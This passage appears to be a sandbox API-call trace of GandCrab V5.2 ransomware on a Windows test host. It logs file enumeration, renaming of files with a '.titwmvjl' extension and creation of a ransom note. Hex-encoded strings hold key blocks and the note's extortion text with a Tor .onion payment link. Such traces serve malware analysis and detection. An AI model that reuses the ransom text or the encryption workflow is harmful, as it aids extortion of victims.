2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.512] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0069.513] CloseHandle (hObject=0x2c4) returned 1 [0069.513] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.513] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.513] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xe, wMilliseconds=0x338)) [0069.513] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.513] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.513] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.514] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\d2ca4a09d2ca4deb61a.lock") returned 92 [0069.514] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\flash player\\assetcache\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0069.515] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.515] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.515] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned 68 [0069.515] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*" [0069.515] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x5037b8 [0069.515] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.515] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.516] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.516] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.516] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.516] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0069.516] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0069.516] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\d2ca4a09d2ca4deb61a.lock" [0069.516] lstrlenW (lpString=".titwmvjl") returned 9 [0069.516] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\d2ca4a09d2ca4deb61a.lock") returned 92 [0069.516] VirtualAlloc (lpAddress=0x0, dwSize=0xf8, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.516] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 101 [0069.516] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\d2ca4a09d2ca4deb61a.lock") returned 92 [0069.516] lstrlenW (lpString=".lock") returned 5 [0069.516] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.516] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0069.516] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.516] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.517] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.517] lstrcmpW (lpString1="NAHQNPMN", lpString2=".") returned 1 [0069.517] lstrcmpW (lpString1="NAHQNPMN", lpString2="..") returned 1 [0069.517] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpString2="NAHQNPMN" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN" [0069.517] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\" [0069.517] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.517] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.517] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.517] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.517] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.517] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.517] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.517] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.518] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.518] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.518] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.518] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\\\TITWMVJL-DECRYPT.txt") returned 98 [0069.518] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\flash player\\assetcache\\nahqnpmn\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0069.769] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x